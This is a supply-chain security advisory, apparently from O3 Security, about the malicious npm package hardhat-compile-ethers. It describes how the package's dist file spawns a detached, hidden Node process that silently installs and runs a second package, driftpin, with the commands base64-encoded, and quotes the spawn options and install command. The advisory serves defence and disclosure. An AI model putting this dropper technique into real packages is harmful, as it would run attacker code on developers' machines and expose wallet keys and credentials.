Malicious package

hardhat-compile-ethers (npm)

Malicious code in hardhat-compile-ethers (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-6705
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall hardhat-compile-ethers

What this malware does

The package's main entry, dist/src/index.js, contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently run npm install driftpin --no-save --silent --no-audit --no-fund, then calls require('driftpin') and invokes getPlugin()(), executing attacker-controlled code in the installer's Node process.

Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, console window hidden on Windows) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and appears only in the published dist artifact, indicating post-build injection.

The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.

Malicious versions

13 flagged:
0.0.1, 0.4.0, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.4.9, 0.4.10, 0.4.11, 0.4.12

Indicators of compromise (SHA-256)

Detection & response playbook

Credential / info stealer
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for hardhat-compile-ethers (13 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging hardhat-compile-ethers across your stack and pipelines.

  2. If you installed it — respond

    hardhat-compile-ethers is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.

  3. Did it already run?

    If hardhat-compile-ethers was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks hardhat-compile-ethers before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. hardhat-compile-ethers on npm has been identified as a malicious package (versions 0.0.1, 0.4.0, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, and 5 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007865, IN-MAL-2026-007863, IN-MAL-2026-007856, IN-MAL-2026-007861, IN-MAL-2026-007864, IN-MAL-2026-007866, IN-MAL-2026-007870, IN-MAL-2026-007869, IN-MAL-2026-007867, IN-MAL-2026-007872, IN-MAL-2026-007868, IN-MAL-2026-007871, IN-MAL-2026-007862

Credits

  • Amazon Inspector · finder

hardhat-compile-ethers (npm) malicious package — MAL-2026-6705 | O3 Security